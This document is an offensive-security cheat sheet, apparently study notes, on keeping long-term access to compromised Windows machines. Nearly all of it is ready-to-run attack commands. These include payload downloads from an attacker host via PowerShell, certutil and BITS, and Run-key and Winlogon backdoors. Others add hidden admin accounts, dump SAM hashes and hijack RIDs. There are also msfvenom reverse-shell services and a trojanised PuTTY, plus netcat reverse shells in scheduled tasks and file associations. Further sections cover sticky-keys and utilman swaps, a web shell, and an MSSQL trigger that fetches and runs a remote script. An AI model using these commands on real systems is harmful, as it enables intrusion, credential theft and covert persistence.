# Persistence

* Gain through
    * Startup folder persistence
    * Editing registry keys
    * Scheduled tasks
    * SUID
    * BITS
    * Creating a backdoored service
    * Creat user
    * RDP

## Gain Persistence on Windows
* Browser. Add to trusted sites.
* Powershell
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```
* DOSprompt
```cmd
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
### Paths to Persistence
* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Put the reverse_shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
```
### Background Intelligence Transfer Service (BITS)
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```

## Elevate Privileges
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup administrators <user> /add` 
* Check `net localgroup Administrator`

### More stealthy

* Backup Operator group is more stealthy, no admin by r/w on files
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* The following two groups are assigned through membership of `Backup Operators`
    * SeBackupPrivilege, read files
    * SeRestorePrivilege, write files

* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
* Backup `SAM` and `SYSTEM` via 
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash via evil-winrm

### secedit

* Get r/w on files through editing a config file
* Export secedit and open it 
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before

### Relative ID (RID)

* UID like in linux
    * Administrator has `RID = 500`
    * Other interactive users `RID >= 1000`
* Get RIDs
```sh
 wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
 PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
* Insert LE hex of `0d500`, which is `f401`

## Add to registry

* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```

## Add a Service

### Meterpreter

* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```

### Powershell

* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```

* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```

* Modify an existing service
    * Enumerate all the services
```sh
sc.exe query state=all
```
    * Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
    * Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```

## Add Scheduled Task

```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```

* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
    * Check task
```sh
schtasks /query /tn SteamUpdater
```

* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```

## File Backdoor

### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```

### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
    * Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via 
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```

### File Association

* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1` 
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`


## Persistence via Logon 

### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```

### Registry Keys

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`

* Create `Expandable String Value` under any of this keys with the value of the reverse shell path


* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
    * Either `shell` or `Userinit` can be appended with a comma separated command

### Logon Scripts

* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts

* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload


## RDP or Login Screen

### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe` 
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

### Utilman

* Ease of access button is clickable at the login screen, it is executed with system privileges 
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```

## Web Shell

* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege` 

* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`

## MSSQL

* Triggers bind actions such as INSERTs

* Open Microsoft SQL Server Management Studio
    * Choose windows auth
    * `New Query`
    * Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
    * Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```

    * Change to DB
```sh
USE <DATABASE>
```

    * Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```

* Trigger the trigger by visiting the site which triggers the trigger through a db call